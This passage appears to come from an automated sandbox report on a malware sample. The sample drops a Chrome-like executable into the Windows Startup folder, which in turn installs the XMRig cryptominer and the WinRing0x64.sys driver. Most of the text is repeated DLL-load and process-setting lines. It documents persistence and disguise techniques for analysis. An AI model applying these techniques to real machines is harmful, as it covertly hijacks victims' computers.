Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\xmrig\xmrig-6.22.2\xmrig.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\174.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Source: 174.exe

Static PE information: 0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]

Source: xmrig.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x6280f4
Source: 174.exe	Static PE information: real checksum: 0xc3e77c5a should be: 0xac34
Source: chrtrome22.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x6c0c

Source: xmrig.exe.1.dr	Static PE information: section name: _RANDOMX
Source: xmrig.exe.1.dr	Static PE information: section name: _TEXT_CN
Source: xmrig.exe.1.dr	Static PE information: section name: _TEXT_CN
Source: xmrig.exe.1.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 1_2_00007FFD9B8B443D push ebx; retf 000Ch	1_2_00007FFD9B8B44BA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 1_2_00007FFD9B8B4F22 pushad ; ret	1_2_00007FFD9B8B4F4D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 1_2_00007FFD9B8B44BD push ebx; retf 000Ch	1_2_00007FFD9B8B44BA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 6_2_00007FFD9B89461D push ebx; ret	6_2_00007FFD9B89464A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 6_2_00007FFD9B895585 push esp; retf	6_2_00007FFD9B8955C3
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Code function: 6_2_00007FFD9B8954F0 push esp; retf	6_2_00007FFD9B8955C3

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

File created: C:\xmrig\xmrig-6.22.2\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	File created: C:\xmrig\xmrig-6.22.2\xmrig.exe	Jump to dropped file
Source: C:\Users\user\Desktop\174.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	File created: C:\xmrig\xmrig-6.22.2\WinRing0x64.sys	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Users\user\Desktop\174.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Jump to dropped file

Source: C:\Users\user\Desktop\174.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Jump to behavior

Source: C:\Users\user\Desktop\174.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Jump to behavior

Source: C:\Users\user\Desktop\174.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
